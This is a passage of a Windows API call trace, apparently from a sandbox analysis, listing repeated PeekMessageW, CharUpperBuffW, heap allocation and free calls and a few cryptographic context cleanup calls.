lpMsg=0x8bf3c0) returned 0 [0209.812] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.813] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.813] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.813] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.813] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.813] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.813] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.813] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.813] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.813] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0209.813] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.813] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.813] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.814] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.814] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.814] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0209.814] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.814] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0209.814] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0209.814] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.814] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.814] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.815] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.815] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.815] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0209.815] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.815] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0209.815] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.815] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.815] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.815] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.816] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.816] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.816] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0209.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.816] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0209.816] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.816] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.816] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.816] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.816] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.816] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.816] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.816] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.816] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.816] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.817] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.817] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.817] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.817] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.817] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0209.817] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.817] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0209.817] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.818] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0209.818] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.818] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.818] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0209.818] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.818] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0209.818] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.818] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.818] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0209.818] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.818] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0209.818] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.818] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0209.818] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.818] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.818] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.819] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.819] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.819] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.819] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.820] CryptReleaseContext (hProv=0xad27a8, dwFlags=0x0) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0209.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0209.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0209.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.822] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0209.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0209.822] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0209.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.823] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0209.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0209.823] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0209.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0209.824] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.824] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.825] FreeLibrary (hLibModule=0x74d40000) returned 1 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.825] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.825] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, 